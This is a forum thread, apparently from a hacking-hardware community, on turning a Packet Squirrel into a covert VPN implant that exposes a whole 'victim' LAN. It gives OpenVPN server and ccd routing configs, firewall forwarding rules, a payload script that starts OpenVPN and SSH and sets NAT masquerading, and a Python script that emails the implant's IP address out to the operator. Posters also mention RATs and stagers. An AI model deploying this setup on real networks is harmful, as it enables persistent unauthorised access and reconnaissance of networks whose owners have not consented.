VPN Remote Access to whole Network

[StampeRnator]

Now if i use the PacketSquirrel as VPN Client i can SSH into it from another Client in this VPN. But is it also possible to put the squirrel to an LAN an get access to the entire local network? Spent 1 hour for VPN Server/Client settings but it's still didn't get it to work.

[biob]

Maybe do something with port forwarding on the PS?

[biob]

Just found this...https://superuser.com/questions/1225259/port-forwarding-from-openvpn-client-to-public-internet

havent read it properly as I’m walking and trying to avoid walking into things :-)

[StampeRnator]

Hmmm...Trying it with the config like Darren mentioned in the LANTurtle Episode 1921. But on the squirrel the /etc/config/network are the settings not persistent. Would be there an solution?

 

[PoSHMagiC0de]

If you use the graphical (free for 2 connections) VPN then it has settings in there to make the connection from a client a gateway.  It needs to know the subnet of the client though so if you do not know, you will have to do the routing by hand.  Also, you have to make sure the interface that faces the victim's network is set in iptables to masquerade.

The iptables stuff you can make part of the payload to configure each time for persistence.

If you are using the road warrior for your script, it will have to be done by hand in the payload script for routing, you will have to add the routing to the server so it knows where that subnet is and the machine you are using will need a route to the server for that subnet so your machine knows where it is.  I have not researched this deep enough but for the clients for OpenVPN on the server there is a client script folder.  If you have your routes and stuff commands in there, the client that script is associated with will download that script and run it after connecting to openvpn thus all your routes and mappings can be done then.  Do not know if your iptables can be in there too for masquerading the exit point on the victim network.

 

I have the PS but have yet to dig deeply into trying stuff but if I was to put a Raspberry Pi RAT out there, this would be the procedures that would need to be taken to get a VPN tunnel to expose the victim's network.

Now having a listener from your attack machine through VPN to victim network will take port forwarding because the victim that gets the stager cannot see the PS as a gateway by default, the stager needs to point to the PS and port that is forwarded so it gets back to the attacker machine and port framework is listening on.

 

Prepare for some routing fun.

[StampeRnator]

10 minutes ago, PoSHMagiC0de said:

If you use the graphical (free for 2 connections) VPN then it has settings in there to make the connection from a client a gateway.  It needs to know the subnet of the client though so if you do not know, you will have to do the routing by hand.  Also, you have to make sure the interface that faces the victim's network is set in iptables to masquerade.

I didnt need the VPN GUI i think my config is right (If I tracert from my second "pentester" VPN Client the hop goes to the VPN IP of the PS.

BUT after that there is no response. I think it's an firewall Problem of the firewall on the PS.

[StampeRnator]

Addition Info:

Always using the first VPN mode (FOR_CLIENTS=0).

Adding iptables prerouting in payload or /etc/firewall.user dont work. 

Im still thinking the Server routing etc. is correct. 

[StampeRnator]

Is this Feature planned for the future? Else i try it until it works :D

[PoSHMagiC0de]

Try the masquerading with your iptables.  You might can just masquerade with no interface and it will work like you do with sharing INet with Pineapple and BB through *Nix systems.

iptables -A POSTROUTING -t nat -j MASQUERADE

I know if I share inet with my pi Zero W I do not need to directly add a iptable to either the pi nor the host machine to nat traffic specifically from one to the other to share inet.  I just need to make sure ip forwarding is enabled on the host machine, a default route is present or routes for subnets I want to forward to and masquerading for the nat table is set on the host.  Default gateway needs to be on the Pi also pointing to the IP of the host it is connected to.  So, I am turning my host machine into a router for the pi. 

So, you need the ping to look like it came from the PS with masquerade.  Without it, I believe it sees it is from that IP of the machine which the machines on the network do not know where that is since their gateway is the router for the network, not the PS that contains the route.  This also means you need to be running in a mode that the PS gets its own IP too.

[Lux Æterna]

Hey @StampeRnator, I detailed my solution to your problem here, hope this helps!

[PoSHMagiC0de]

17 minutes ago, Lux Æterna said:

Hey @StampeRnator, I detailed my solution to your problem here, hope this helps!

I didn't even see that.  I typed all that crap out for nothing.

Welp, now I know where the client script folder goes on a non-graphical VPN connection.

For everyone who followed this.  This is how the graphical OpenVPN does the routing behind the scenes when you create clients.  So if you wanted to get creative you could edit that roadwarrior script, or that other one I posted somewhere that has extra encryption options on it, to include a config section for the route configs/ccd configs.  Might want to include a check to make sure you do not have duplicate subnets anywhere (grep file for same subnets or subnets within a super subnet...etc.)

[StampeRnator]

Now i write down my config for this maybe it can be optimized (i'm only an scriptkiddie :P) :D

My VPN Network: 10.9.0.0/24
My Target Network: 192.168.1.0/24

First VPN Server Config:

Like @Lux Æterna mentioned following config for the non GUI Version and roadwarrior script VPN Server "server.conf":

client-config-dir ccd # The ccd only works for me, otherwise "/etc/openvpn/ccd" also works
client-to-client
push "route 192.168.1.0 255.255.255.0" # Your target IP Subnet
route 192.168.1.0 255.255.255.0 # Not sure if needed, i read this is only needed if you want to get access from the VPN Server to the target network
push "route 192.168.0.0 255.255.255.0" # Your target IP Subnet
route 192.168.0.0 255.255.255.0 # Not sure if needed, i read this is only needed if you want to get access from the VPN Server to the target network
push "route 10.0.0.0 255.255.255.0" # Your target IP Subnet
route 10.0.0.0 255.255.255.0 # Not sure if needed, i read this is only needed if you want to get access from the VPN Server to the target network
management 127.0.0.1 5555 # optional if you want to use an VPN status page

If you want to add some more IP Subnets you have to add the "push" and "route" line for every Subnet.

Now the ccd magic. Create a folder "ccd" in /etc/openvpn and cd into it. So now you are in the directory "/etc/openvpn/ccd".

When you are in there create a file that is called the same you created the client.ovpn with the roadwarrior script (default is client).

Content of the file "/etc/openvpn/ccd/client":

ifconfig-push 10.9.0.2 255.255.255.0 # This always gaves the Squirrel the IP address 10.9.0.2. I use the 10.9.0.0/24 VPN IP Subnet, default is 10.8.0.0 so in this case it is 10.8.0.2
iroute 192.168.1.0 255.255.255.0 # Your Target IP Subnet
iroute 192.168.0.0 255.255.255.0 # Your Second Target IP Subnet
iroute 10.0.0.0 255.255.255.0 # Your Third Target IP Subnet

Now the Squirrel Config:

First add this on the end of "/etc/config/firewall":

broken atm...looking for this.

Now my payload.sh:

#!/bin/bash
# OpenVPN payload

# Set to 1 to allow clients to use the VPN
FOR_CLIENTS=0

DNS_SERVER="8.8.8.8"

# Cheap hack to set the DNS server
function setdns() {
        while true
        do
                [[ ! $(grep -q "$DNS_SERVER" /tmp/resolv.conf) ]] && {
                        echo -e "search lan\nnameserver $DNS_SERVER" > /tmp/res$
                }
                sleep 5
        done
}

function start() {
        LED SETUP

        DIR=$(cd "$(dirname "${BASH_SOURCE[0]}")" && pwd)

        # Set NETMODE to BRIDGE and wait 3 seconds
        # to ensure that things can settle

        [[ "$FOR_CLIENTS" == "1" ]] && {
                /usr/bin/NETMODE VPN
        } || {
                /usr/bin/NETMODE BRIDGE
        }
        sleep 3

        # Make OpenVPN use the local configuration
        uci set openvpn.vpn.config="${DIR}/config.ovpn"
        uci commit

        # Start the OpenVPN server in the background
        /etc/init.d/openvpn start

        # Start SSH Server
        /etc/init.d/sshd start &

        # Set DNS server
        setdns &

        # Set iptables for access to entire network (For me only this did the trick). If not for you maybe try to uncomment the optional iptables line
        iptables -A POSTROUTING -t nat -j MASQUERADE
	# OPTIONAL uncomment and change to your needs
	# iptables -t nat -A POSTROUTING -o eth1 -s 10.9.0.0/24 -j MASQUERADE
        LED ATTACK
}

# Start the payload
start &

Optional VPN Status Page:

For this you have added the "management 127.0.0.1 5555" to your "server.conf".

The Script is located here: https://pastebin.com/U9SESPB0

If you have an Webserver on the VPN Server you can show the connected Clients and traffic of the VPN. Just put this into an "vpnstatus.php" on your webserver.
If you use PHP 5.x this script is exactly right. If you use PHP 7 replace "split" with "explode".

Much thanks to @Lux Æterna, @PoSHMagiC0de and the writer of the VPN status Page AND of course @Darren Kitchen for Developing this awesome Squirrel. Without you i couldn't get it to work.

#micdrop

[StampeRnator]

If you don't know the IP Subnet of your target Network i have taken a small python script that i used on my RPi (yay the Squirrel likes Python) to EMail me the actual IP address of the device.

If you know the IP you can change the routing settings on the server and after the reconnect of the OpenVPN Client you can access the network. If you want this i can put this to github.

I put following file to the switch folder "payloads/switch3/mailip.py" (Just GMail works as sender):

__author__ = 'Cody Giles'
__license__ = "Creative Commons Attribution-ShareAlike 3.0 Unported License"
__version__ = "1.0"
__maintainer__ = "Cody Giles"
__status__ = "Production"

import subprocess
import smtplib
from email.mime.text import MIMEText
import datetime

def connect_type(word_list):
    """ This function takes a list of words, then, depeding which key word, returns the corresponding
    internet connection type as a string. ie) 'ethernet'.
    """
    if 'wlan0' in word_list or 'wlan1' in word_list:
        con_type = 'wifi'
    elif 'eth0' in word_list:
        con_type = 'ethernet'
    else:
        con_type = 'current'

    return con_type

# Change to your own account information
# Account Information
to = 'your@mail.com' # Email to send to.
gmail_user = 'yourgmail@gmail.com' # Email to send from. (MUST BE GMAIL)
gmail_password = 'mailpassword' # Gmail password.
smtpserver = smtplib.SMTP('smtp.gmail.com', 587) # Server to use.

smtpserver.ehlo()  # Says 'hello' to the server
smtpserver.starttls()  # Start TLS encryption
smtpserver.ehlo()
smtpserver.login(gmail_user, gmail_password)  # Log in to server
today = datetime.date.today()  # Get current time/date

arg='ip route list'  # Linux command to retrieve ip addresses.
# Runs 'arg' in a 'hidden terminal'.
p=subprocess.Popen(arg,shell=True,stdout=subprocess.PIPE)
data = p.communicate()  # Get data from 'p terminal'.

# Split IP text block into three, and divide the two containing IPs into words.
ip_lines = data[0].splitlines()
split_line_a = ip_lines[0].split()

# con_type variables for the message text. ex) 'ethernet', 'wifi', etc.
ip_type_a = connect_type(split_line_a)

"""Because the text 'src' is always followed by an ip address,
we can use the 'index' function to find 'src' and add one to
get the index position of our ip.
"""
ipaddr_a = split_line_a[split_line_a.index('src')+1]

# Creates a sentence for each ip address.
my_ip_a = 'Your %s ip is %s' % (ip_type_a, ipaddr_a)

# Creates the text, subject, 'from', and 'to' of the message.
msg = MIMEText(my_ip_a)
msg['Subject'] = 'IPs For RaspberryPi on %s' % today.strftime('%b %d %Y')
msg['From'] = gmail_user
msg['To'] = to
# Sends the message
smtpserver.sendmail(gmail_user, [to], msg.as_string())
# Closes the smtp server.
smtpserver.quit()

Don't forget to chmod +x to the mailip.py

Then just add following to your payload:

# Set iptables for access to entire network
        iptables -A POSTROUTING -t nat -j MASQUERADE

        python ${DIR}/mailip.py

        LED ATTACK

And that's it.

#doublemicdrop

[StampeRnator]

6 hours ago, StampeRnator said:

Now the Squirrel Config:

First add this on the end of "/etc/config/firewall":

broken atm...looking for this.

Okay. Only with the following on the end of "/etc/config/firewall" works the connection to the Packetsquirrel Network:

config forwarding 'vpn'
	option src 'tun0'
	option dest 'lan'

config forwarding 'vpn'
	option src 'lan'
	option dest 'tun0'

If the VPN payload is startet everything on the Machine on the Network in on the Squirrel is ok (Internet Connection)

But in Arming Mode there is no Internet. DNS looks to work. But to HTTP or similar. Maybe somebody has an suggestion?

[PoSHMagiC0de]

Remove the email part if you want.  If the VPN is going to come up and work one way like from squirrel to server then just have it scp a file onto the server for you to look at for the network information, if you own the server.

 

[GrineUlf]

Or just SSH into the turtle, get the network information, update the client file on the server and restart the server. The PS reconnects anyway after a minute or two ?

[Kiril Miloshev]

Ok, i still cant make this work. No ping to the squirrel br-lan ip address or the other part of the target network. Have tried all of the above.

Any ideas? 

[INFOTRACE]

On 12/3/2018 at 3:32 PM, Kiril Miloshev said:

Ok, i still cant make this work. No ping to the squirrel br-lan ip address or the other part of the target network. Have tried all of the above.

Any ideas? 

Hi Kiril,

Did you resolve the issues back in 2018 and if so how? Would you recommend the device?

Cheers 😎

[BRS Chief Scientist]

On 11/13/2017 at 1:06 PM, PoSHMagiC0de said:

If you use the graphical (free for 2 connections) VPN then it has settings in there to make the connection from a client a gateway.  It needs to know the subnet of the client though so if you do not know, you will have to do the routing by hand.  Also, you have to make sure the interface that faces the victim's network is set in iptables to masquerade.

The iptables stuff you can make part of the payload to configure each time for persistence.

If you are using the road warrior for your script, it will have to be done by hand in the payload script for routing, you will have to add the routing to the server so it knows where that subnet is and the machine you are using will need a route to the server for that subnet so your machine knows where it is.  I have not researched this deep enough but for the clients for OpenVPN on the server there is a client script folder.  If you have your routes and stuff commands in there, the client that script is associated with will download that script and run it after connecting to openvpn thus all your routes and mappings can be done then.  Do not know if your iptables can be in there too for masquerading the exit point on the victim network.

 

I have the PS but have yet to dig deeply into trying stuff but if I was to put a Raspberry Pi RAT out there, this would be the procedures that would need to be taken to get a VPN tunnel to expose the victim's network.

Now having a listener from your attack machine through VPN to victim network will take port forwarding because the victim that gets the stager cannot see the PS as a gateway by default, the stager needs to point to the PS and port that is forwarded so it gets back to the attacker machine and port framework is listening on.

 

Prepare for some routing fun.

Thanks for the input.